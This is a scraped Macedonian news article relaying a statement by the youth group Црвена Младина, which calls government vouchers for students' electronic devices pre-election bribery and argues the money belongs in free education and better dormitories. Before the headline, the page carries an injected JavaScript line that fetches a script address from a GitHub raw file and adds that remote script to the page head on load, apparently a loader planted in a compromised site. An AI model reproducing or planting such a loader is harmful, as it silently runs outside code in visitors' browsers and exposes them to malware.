;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Црвена Младина: Ваучерите за електронските уреди за студентите се предизборен поткуп - Антропол
АктуелноЛокално

Црвена Младина: Ваучерите за електронските уреди за студентите се предизборен поткуп

Владата на РМ објави дека сите студенти ќе добијат ваучери за набавка на електронски уреди, но оваа мерка е ништо повеќе од предизборен поткуп. Во време кога студирањето во Македонија станува сè поскапо, овие средства треба да бидат пренасочени кон создавање на услови за БЕСПЛАТНО ОБРАЗОВАНИЕ, што е единствениот праведен начин за поддршка на младите.

Младите често мислат дека “бесплатното образование” е далечна и недостижна идеја, но реалноста е дека овие ваучери покажуваат дека средства постојат! Наместо да се трошат за привремени решенија, Владата можеше комплетно да ја покрие сумата што студентите ја плаќаат за студирање, правејќи го високото образование навистина достапно за сите.

Замислете, овие пари можеа да се искористат за довршување на недовршените факултети, реконструкција на студентските домови и подобрување на условите за живот и учење, или да се инвестира во дигитализација на универзитетите, овозможувајќи им на студентите подобар пристап до технологија и образовни ресурси.

Наместо краткорочни потези кои служат само за предизборен маркетинг, Владата треба да вложи во системски реформи кои ќе донесат реална и трајна промена во животот на младите. Ако има средства за ваучери, тогаш има средства и за бесплатно студирање и за вистински инвестиции во квалитетно образование.

Црвена Младина смета дека младите заслужуваат многу повеќе од ваучери за електронски уреди кои нема да ги решат нивните реални проблеми. Потребно е вистинско инвестирање во младите преку обезбедување на бесплатен пристап до квалитетно образование и подобрување на условите во студентските домови и универзитети. Гледате дека може – само треба да се има волја, се вели во нивното соопштение.